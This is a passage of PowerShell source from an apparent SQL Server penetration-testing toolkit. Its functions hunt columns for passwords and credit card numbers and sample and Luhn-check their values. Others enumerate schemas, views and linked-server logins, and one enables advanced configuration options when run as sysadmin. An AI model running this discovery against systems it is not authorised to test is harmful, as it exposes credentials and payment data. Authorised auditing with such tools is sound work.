SilentlyContinue\n                        }\n                        else\n                        {\n                            $LuhnCheck = 'False'\n                        }\n\n                        # Add record\n                        $null = $TblData.Rows.Add($ComputerName, $Instance, $sDatabaseName, $sSchemaName, $sTableName, $sColumnName, $_, $RowCount, $LuhnCheck)\n                    }\n                    else\n                    {\n                        # Add record\n                        $null = $TblData.Rows.Add($ComputerName, $Instance, $sDatabaseName, $sSchemaName, $sTableName, $sColumnName, $_, $RowCount)\n                    }\n                }\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : - No columns were found that matched the search.\"\n            }\n        }\n\n        # Status User\n        if( -not $SuppressVerbose)\n        {\n            Write-Verbose -Message \"$Instance : END SEARCH DATA BY COLUMN\"\n        }\n    }\n\n    End\n    {\n        # Return data\n        if ( -not $NoOutput)\n        {\n            Return $TblData\n        }\n    }\n}\n\n\n# ---------------------------------------\n# Get-SQLColumnSampleDataThreaded\n# ---------------------------------------\n# Author: Scott Sutherland\nFunction Get-SQLColumnSampleDataThreaded\n{\n    <#\n            .SYNOPSIS\n            Returns column information from target SQL Servers. Supports search by keywords, sampling data, and validating credit card numbers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DAC\n            Connect using Dedicated Admin Connection.\n            .PARAMETER $NoOutput\n            Don't output any sample data.\n            .PARAMETER SampleSize\n            Number of records to sample.\n            .PARAMETER Keywords\n            Comma seperated list of keywords to search for.\n            .PARAMETER DatabaseName\n            Database to filter on.\n            .PARAMETER NoDefaults\n            Don't show columns from default databases.\n            .PARAMETER ValidateCC\n            Use Luhn formula to check if sample is a valid credit card.\n\n            .PARAMETER Threads\n            Number of concurrent host threads.\n            .EXAMPLE\n            PS C:\\> Get-SQLColumnSampleDataThreaded -verbose -Instance SQLServer1\\STANDARDDEV2014 -Keywords \"account,credit,card\" -SampleSize 5 -ValidateCC | ft -AutoSize\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : START SEARCH DATA BY COLUMN\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : CONNECTION SUCCESS\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : - Searching for column names that match criteria...\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : - Column match: [testdb].[dbo].[tracking].[card]\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : - Selecting 5 rows of data sample from column [testdb].[dbo].[tracking].[card].\n            VERBOSE: SQLServer1\\STANDARDDEV2014 : COMPLETED SEARCH DATA BY COLUMN\n\n            ComputerName   Instance                   Database Schema Table    Column Sample           RowCount IsCC\n            ------------   --------                   -------- ------ -----    ------ ------           -------- ----\n            SQLServer1     SQLServer1\\STANDARDDEV2014 testdb   dbo    tracking card   4111111111111111 2        True\n            SQLServer1     SQLServer1\\STANDARDDEV2014 testdb   dbo    tracking card   41111111111ASDFD 2        False\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLColumnSampleDataThreaded -Keywords \"account,credit,card\" -SampleSize 5 -ValidateCC -Threads 10\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't output anything.\")]\n        [string]$NoOutput,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Number of records to sample.')]\n        [int]$SampleSize = 1,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Comma seperated list of keywords to search for.')]\n        [string]$Keywords = 'Password',\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Database name to filter on.')]\n        [string]$DatabaseName,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't select tables from default databases.\")]\n        [switch]$NoDefaults,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Use Luhn formula to check if sample is a valid credit card.')]\n        [switch]$ValidateCC,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Number of threads.')]\n        [int]$Threads = 5,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblData = New-Object -TypeName System.Data.DataTable\n        $null = $TblData.Columns.Add('ComputerName')\n        $null = $TblData.Columns.Add('Instance')\n        $null = $TblData.Columns.Add('Database')\n        $null = $TblData.Columns.Add('Schema')\n        $null = $TblData.Columns.Add('Table')\n        $null = $TblData.Columns.Add('Column')\n        $null = $TblData.Columns.Add('Sample')\n        $null = $TblData.Columns.Add('RowCount')\n\n        if($ValidateCC)\n        {\n            $null = $TblData.Columns.Add('IsCC')\n        }\n\n        # Setup data table for pipeline threading\n        $PipelineItems = New-Object -TypeName System.Data.DataTable\n\n        # set instance to local host by default\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Ensure provided instance is processed\n        if($Instance)\n        {\n            $ProvideInstance = New-Object -TypeName PSObject -Property @{\n                Instance = $Instance\n            }\n        }\n\n        # Add instance to instance list\n        $PipelineItems = $PipelineItems + $ProvideInstance\n    }\n\n    Process\n    {\n        # Create list of pipeline items\n        $PipelineItems = $PipelineItems + $_\n    }\n\n    End\n    {\n        # Define code to be multi-threaded\n        $MyScriptBlock = {\n            # Set instance\n            $Instance = $_.Instance\n\n            # Parse computer name from the instance\n            $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n            # Default connection to local default instance\n            if(-not $Instance)\n            {\n                $Instance = $env:COMPUTERNAME\n            }\n\n            # Test connection to server\n            $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n                $_.Status -eq 'Accessible'\n            }\n            if(-not $TestConnection)\n            {\n                if( -not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance : CONNECTION FAILED\"\n                }\n                Return\n            }\n            else\n            {\n                if( -not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance : START SEARCH DATA BY COLUMN\"\n                    Write-Verbose -Message \"$Instance : - Connection Success.\"\n                    Write-Verbose -Message \"$Instance : - Searching for column names that match criteria...\"\n                }\n\n                if($NoDefaults)\n                {\n                    # Search for columns\n                    $Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -ColumnNameSearch $Keywords -NoDefaults -SuppressVerbose\n                }else\n                {\n                    $Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -ColumnNameSearch $Keywords -SuppressVerbose\n                }\n            }\n\n            # Check if columns were found\n            if($Columns)\n            {\n                # List columns found\n                $Columns|\n                ForEach-Object -Process {\n                    $sDatabaseName = $_.DatabaseName\n                    $sSchemaName = $_.SchemaName\n                    $sTableName = $_.TableName\n                    $sColumnName = $_.ColumnName\n                    $AffectedColumn = \"[$sDatabaseName].[$sSchemaName].[$sTableName].[$sColumnName]\"\n                    $AffectedTable = \"[$sDatabaseName].[$sSchemaName].[$sTableName]\"\n                    $Query = \"USE $sDatabaseName; SELECT TOP $SampleSize [$sColumnName] FROM $AffectedTable WHERE [$sColumnName] is not null\"\n                    $QueryRowCount = \"USE $sDatabaseName; SELECT count(CAST([$sColumnName] as VARCHAR(200))) as NumRows FROM $AffectedTable WHERE [$sColumnName] is not null\"\n\n                    # Status user\n                    if( -not $SuppressVerbose)\n                    {\n                        Write-Verbose -Message \"$Instance : - Column match: $AffectedColumn\"\n                        Write-Verbose -Message \"$Instance : - Selecting $SampleSize rows of data sample from column $AffectedColumn.\"\n                    }\n\n                    # Get row count for column matches\n                    $RowCount = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $QueryRowCount -SuppressVerbose | Select-Object -Property NumRows -ExpandProperty NumRows\n\n                    # Get sample data\n                    Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $Query -SuppressVerbose |\n                    Select-Object -ExpandProperty $sColumnName |\n                    ForEach-Object -Process {\n                        if($ValidateCC)\n                        {\n                            # Check if value is CC\n                            $Value = 0\n                            if([uint64]::TryParse($_,[ref]$Value))\n                            {\n                                $LuhnCheck = Test-IsLuhnValid $_ -ErrorAction SilentlyContinue\n                            }\n                            else\n                            {\n                                $LuhnCheck = 'False'\n                            }\n\n                            # Add record\n                            $null = $TblData.Rows.Add($ComputerName, $Instance, $sDatabaseName, $sSchemaName, $sTableName, $sColumnName, $_, $RowCount, $LuhnCheck)\n                        }\n                        else\n                        {\n                            # Add record\n                            $null = $TblData.Rows.Add($ComputerName, $Instance, $sDatabaseName, $sSchemaName, $sTableName, $sColumnName, $_, $RowCount)\n                        }\n                    }\n                }\n            }\n            else\n            {\n                if( -not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance : - No columns were found that matched the search.\"\n                }\n            }\n\n            # Status User\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : END SEARCH DATA BY COLUMN\"\n            }\n        }\n\n        # Run scriptblock using multi-threading\n        $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue\n\n        return $TblData\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLDatabaseSchema\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLDatabaseSchema\n{\n    <#\n            .SYNOPSIS\n            Returns schema information from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DAC\n            Connect using Dedicated Admin Connection.\n            .PARAMETER DatabaseName\n            Database name to filter for.\n            .PARAMETER SchemaName\n            Schema name to filter for.\n            .PARAMETER NoDefaults\n            Only show information for non default databases.\n\n            .EXAMPLE\n            PS C:\\> Get-SQLDatabaseSchema -Instance SQLServer1\\STANDARDDEV2014 -DatabaseName testdb\n\n            ComputerName : SQLServer1\n            Instance     : SQLServer1\\STANDARDDEV2014\n            DatabaseName : testdb\n            SchemaName   : db_accessadmin\n            SchemaOwner  : db_accessadmin\n            [TRUNCATED]\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLDatabaseSchema -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Database name.')]\n        [string]$DatabaseName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Schema name.')]\n        [string]$SchemaName,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't select tables from default databases.\")]\n        [switch]$NoDefaults,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblSchemas = New-Object -TypeName System.Data.DataTable\n\n        # Setup schema filter\n        if($SchemaName)\n        {\n            $SchemaNameFilter = \" where schema_name like '%$SchemaName%'\"\n        }\n        else\n        {\n            $SchemaNameFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Setup NoDefault filter\n        if($NoDefaults)\n        {\n            # Get list of databases\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose\n        }\n        else\n        {\n            # Get list of databases\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose\n        }\n\n        # Get tables for each database\n        $TblDatabases |\n        ForEach-Object -Process {\n            # Get database name\n            $DbName = $_.DatabaseName\n\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Grabbing Schemas from the $DbName database...\"\n            }\n\n            # Define Query\n            $Query = \"  USE $DbName;\n                SELECT  '$ComputerName' as [ComputerName],\n                '$Instance' as [Instance],\n                CATALOG_NAME as [DatabaseName],\n                SCHEMA_NAME as [SchemaName],\n                SCHEMA_OWNER as [SchemaOwner]\n                FROM    [$DbName].[INFORMATION_SCHEMA].[SCHEMATA]\n                $SchemaNameFilter\n            ORDER BY SCHEMA_NAME\"\n\n            # Execute Query\n            $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -SuppressVerbose\n\n            # Append results\n            $TblSchemas = $TblSchemas + $TblResults\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblSchemas\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLView\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLView\n{\n    <#\n            .SYNOPSIS\n            Returns view information from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DatabaseName\n            Database name to filter for.\n            .PARAMETER ViewName\n            View name to filter for.\n            .PARAMETER NoDefaults\n            Only display results from non default databases.\n            .EXAMPLE\n            PS C:\\> Get-SQLView -Instance SQLServer1\\STANDARDDEV2014 -DatabaseName master\n\n            ComputerName   : SQLServer1\n            Instance       : SQLServer1\\STANDARDDEV2014\n            DatabaseName   : master\n            SchemaName     : dbo\n            ViewName       : spt_values\n            ViewDefinition :\n            create view spt_values as\n            select name collate database_default as name,\n            number,\n            type collate database_default as type,\n            low, high, status\n            from sys.spt_values\n            IsUpdatable    : NO\n            CheckOption    : NONE\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Get-SQLView -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Database name.')]\n        [string]$DatabaseName,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'View name.')]\n        [string]$ViewName,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't select tables from default databases.\")]\n        [switch]$NoDefaults,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblViews = New-Object -TypeName System.Data.DataTable\n\n        # Setup View filter\n        if($ViewName)\n        {\n            $ViewFilter = \" where table_name like '%$ViewName%'\"\n        }\n        else\n        {\n            $ViewFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n                Write-Verbose -Message \"$Instance : Grabbing views from the databases below:\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Setup NoDefault filter\n        if($NoDefaults)\n        {\n            # Get list of databases\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose\n        }\n        else\n        {\n            # Get list of databases\n            $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose\n        }\n\n        # Get tables for each database\n        $TblDatabases |\n        ForEach-Object -Process {\n            # Get database name\n            $DbName = $_.DatabaseName\n\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : - $DbName\"\n            }\n\n            # Define Query\n            $Query = \"  USE $DbName;\n                SELECT  '$ComputerName' as [ComputerName],\n                '$Instance' as [Instance],\n                TABLE_CATALOG as [DatabaseName],\n                TABLE_SCHEMA as [SchemaName],\n                TABLE_NAME as [ViewName],\n                VIEW_DEFINITION as [ViewDefinition],\n                IS_UPDATABLE as [IsUpdatable],\n                CHECK_OPTION as [CheckOption]\n                FROM    [INFORMATION_SCHEMA].[VIEWS]\n                $ViewFilter\n            ORDER BY TABLE_CATALOG,TABLE_SCHEMA,TABLE_NAME\"\n\n            # Execute Query\n            $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n            # Append results\n            $TblViews = $TblViews + $TblResults\n        }\n    }\n\n    End\n    {\n        # Return data\n        $TblViews\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLServerLink\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLServerLink\n{\n    <#\n            .SYNOPSIS\n            Returns link servers from target SQL Servers.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER DatabaseLinkName\n            Database link name to filter for.\n            .EXAMPLE\n            PS C:\\> Get-SQLServerLink -Instance SQLServer1\\STANDARDDEV2014\n\n            ComputerName           : SQLServer1\n            Instance               : SQLServer1\\STANDARDDEV2014\n            DatabaseLinkId         : 0\n            DatabaseLinkName       : SQLServer1\\STANDARDDEV2014\n            DatabaseLinkLocation   : Local\n            Product                : SQL Server\n            Provider               : SQLNCLI\n            Catalog                :\n            Local Login            : Uses Self Credentials\n            RemoteLoginName        :\n            is_rpc_out_enabled     : True\n            is_data_access_enabled : False\n            modify_date            : 3/13/2016 12:30:33 PM\n\n            ComputerName           : SQLServer1\n            Instance               : SQLServer1\\STANDARDDEV2014\n            DatabaseLinkId         : 1\n            DatabaseLinkName       : SQLServer2\\SQLEXPRESS\n            DatabaseLinkLocation   : Remote\n            Product                : SQL Server\n            Provider               : SQLNCLI\n            Catalog                :\n            Local Login            :\n            RemoteLoginName        : user123\n            is_rpc_out_enabled     : False\n            is_data_access_enabled : True\n            modify_date            : 5/6/2016 10:20:44 AM\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLServerLink -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipeline = $true,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server link name.')]\n        [string]$DatabaseLinkName,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblServerLinks = New-Object -TypeName System.Data.DataTable\n\n        # Setup DatabaseLinkName filter\n        if($DatabaseLinkName)\n        {\n            $VDatabaseLinkNameFilter = \" WHERE a.name like '$DatabaseLinkName'\"\n        }\n        else\n        {\n            $DatabaseLinkNameFilter = ''\n        }\n    }\n\n    Process\n    {\n        # Parse computer name from the instance\n        $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n        # Default connection to local default instance\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Test connection to instance\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if($TestConnection)\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Success.\"\n            }\n        }\n        else\n        {\n            if( -not $SuppressVerbose)\n            {\n                Write-Verbose -Message \"$Instance : Connection Failed.\"\n            }\n            return\n        }\n\n        # Define Query\n        $Query = \"  SELECT  '$ComputerName' as [ComputerName],\n            '$Instance' as [Instance],\n            a.server_id as [DatabaseLinkId],\n            a.name AS [DatabaseLinkName],\n            CASE a.Server_id\n            WHEN 0\n            THEN 'Local'\n            ELSE 'Remote'\n            END AS [DatabaseLinkLocation],\n            a.product as [Product],\n            a.provider as [Provider],\n            a.catalog as [Catalog],\n            'LocalLogin' = CASE b.uses_self_credential\n            WHEN 1 THEN 'Uses Self Credentials'\n            ELSE c.name\n            END,\n            b.remote_name AS [RemoteLoginName],\n            a.is_rpc_out_enabled,\n            a.is_data_access_enabled,\n            a.modify_date\n            FROM [Master].[sys].[Servers] a\n            LEFT JOIN [Master].[sys].[linked_logins] b\n            ON a.server_id = b.server_id\n            LEFT JOIN [Master].[sys].[server_principals] c\n            ON c.principal_id = b.local_principal_id\n        $DatabaseLinkNameFilter\"\n\n        # Execute Query\n        $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n        # Append results\n        $TblServerLinks = $TblServerLinks + $TblResults\n    }\n\n    End\n    {\n        # Return data\n        $TblServerLinks\n    }\n}\n\n\n# ----------------------------------\n#  Get-SQLServerConfiguration\n# ----------------------------------\n# Author: Scott Sutherland\nFunction  Get-SQLServerConfiguration\n{\n    <#\n            .SYNOPSIS\n            Returns configuration information from the server using sp_configure.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .EXAMPLE\n            PS C:\\> Get-SQLServerConfiguration -Instance SQLServer1\\STANDARDDEV2014\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceLocal | Get-SQLServerConfiguration -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Nubmer of hosts to query at one time.')]\n        [int]$Threads = 5,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Suppress verbose errors.  Used when function is wrapped.')]\n        [switch]$SuppressVerbose\n    )\n    Begin\n    {\n        # Setup data table for output\n        $TblCommands = New-Object -TypeName System.Data.DataTable\n        $TblResults = New-Object -TypeName System.Data.DataTable\n        $null = $TblResults.Columns.Add('ComputerName')\n        $null = $TblResults.Columns.Add('Instance')\n        $null = $TblResults.Columns.Add('Name')\n        $null = $TblResults.Columns.Add('Minimum')\n        $null = $TblResults.Columns.Add('Maximum')\n        $null = $TblResults.Columns.Add('config_value')\n        $null = $TblResults.Columns.Add('run_value')\n\n\n        # Setup data table for pipeline threading\n        $PipelineItems = New-Object -TypeName System.Data.DataTable\n\n        # set instance to local host by default\n        if(-not $Instance)\n        {\n            $Instance = $env:COMPUTERNAME\n        }\n\n        # Ensure provided instance is processed\n        if($Instance)\n        {\n            $ProvideInstance = New-Object -TypeName PSObject -Property @{\n                Instance = $Instance\n            }\n        }\n\n        # Add instance to instance list\n        $PipelineItems = $PipelineItems + $ProvideInstance\n    }\n\n    Process\n    {\n        # Create list of pipeline items\n        $PipelineItems = $PipelineItems + $_\n    }\n\n    End\n    {\n        # Define code to be multi-threaded\n        $MyScriptBlock = {\n            $Instance = $_.Instance\n\n            # Parse computer name from the instance\n            $ComputerName = Get-ComputerNameFromInstance -Instance $Instance\n\n            # Default connection to local default instance\n            if(-not $Instance)\n            {\n                $Instance = $env:COMPUTERNAME\n            }\n\n            # Setup DAC string\n            if($DAC)\n            {\n                # Create connection object\n                $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut\n            }\n            else\n            {\n                # Create connection object\n                $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut\n            }\n\n            # Attempt connection\n            try\n            {\n                # Open connection\n                $Connection.Open()\n\n                if(-not $SuppressVerbose)\n                {\n                    Write-Verbose -Message \"$Instance : Connection Success.\"\n                }\n\n                # Switch to track advanced options\n                $DisableShowAdvancedOptions = 0\n\n                # Get show advance status\n                $IsShowAdvancedEnabled = Get-SQLQuery -Instance $Instance -Query \"sp_configure 'Show Advanced Options'\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value\n\n                # Get sysadmin status\n                $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin\n\n                # Enable show advanced options if needed\n                if ($IsShowAdvancedEnabled -eq 1)\n                {\n                    if(-not $SuppressVerbose)\n                    {\n                        Write-Verbose -Message \"$Instance : Show Advanced Options is already enabled.\"\n                    }\n                }\n                else\n                {\n                    if(-not $SuppressVerbose)\n                    {\n                        Write-Verbose -Message \"$Instance : Show Advanced Options is disabled.\"\n                    }\n\n                    if($IsSysadmin -eq 'Yes')\n                    {\n                        if(-not $SuppressVerbose)\n                        {\n                            Write-Verbose -Message \"$Instance : Your a sysadmin, trying to enabled it.\"\n                        }\n\n                        # Try to enable Show Advanced Options\n                        Get-SQLQuery -Instance $Instance -Query \"sp_configure 'Show Advanced Options',1;RECONFIGURE\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n\n                        # Check if configuration change worked\n                        $IsShowAdvancedEnabled2 = Get-SQLQuery -Instance $Instance -Query \"sp_configure 'Show Advanced Options'\" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty 